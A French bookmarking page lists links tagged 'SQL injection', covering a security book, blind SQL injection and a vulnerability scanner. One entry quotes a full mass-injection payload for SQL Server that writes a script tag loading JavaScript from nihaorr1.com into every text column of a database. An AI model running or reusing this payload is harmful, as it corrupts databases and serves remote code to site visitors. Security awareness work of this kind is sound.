public marks

PUBLIC MARKS with tag "injection SQL"

2012

Faire face aux injections SQL

by astrochoupe
Les injections SQL font partie des vulnérabilités les plus courantes d'un site web. La 3e édition de l'ouvrage "Sécurité PHP 5 et MySQL" de Damien Seguy et Philippe Gamache revient en détails sur cet enjeu.

2009

2008

Ghosts In The Stack - Blind SQL Injections

by damdec & 1 other
Les Blind SQL Injections, ou "injections SQL à l'aveuglette" font partie des techniques avancées d'injections SQL. On les utilise dans le cas de scripts à réponse binaire, c'est à dire qui retournent une réponse du type soit vrai, soit faux. C'est le cas par exemple des formulaires d'authentification. Ce type de script n'affiche pas le résultat d'une injection mais indique simplement s'il y a erreur ou succès, d'où la difficulté apparente d'exploitation. C'est pourquoi il faut dans la plupart des cas utilsier la méthode de la force brute, mais de manière relativement intelligente, permettant de gagner un temps énorme.

Anyone know about www.nihaorr1.com/1.js? - IIS.net

by night.kame (via)

DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update [' @T '] set [' @C ']=rtrim(convert(varchar'[' @C '])) ''<script src=nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Avec SQL Server, la vie est plus simple.

2007

2006

Nexen.net : portail PHP et MySQL - Chorizo scanner : revue

by dzc & 1 other
Chorizo Scanner est un nouveau service en ligne pour améliorer la sécurité des applications PHP. Il effectue des tests automatiques pour les vulnérabilités les plus courantes, et permet de rapporter rapidement les erreurs de validations les plus courantes.

PUBLIC TAGS related to tag "injection SQL"

[en] +   [fr] +   ASP +   conception web +   db +   dba +   microsoft +   mysql +   outil +   outils +   php +   securite +   securité +   securité site web +   security +   sensibilisation à la sécurité +   sgbd +   sgdb +   sécurité +   sql +   SQL Injection +   sql server +   synthése +   test +   video +   web +   webmaster +  

Active users

astrochoupe
last mark : 12/01/2012 22:15

dzc
last mark : 12/11/2009 11:25

damdec
last mark : 10/10/2008 14:26

night.kame
last mark : 26/04/2008 13:58

jmfontaine
last mark : 21/05/2007 10:54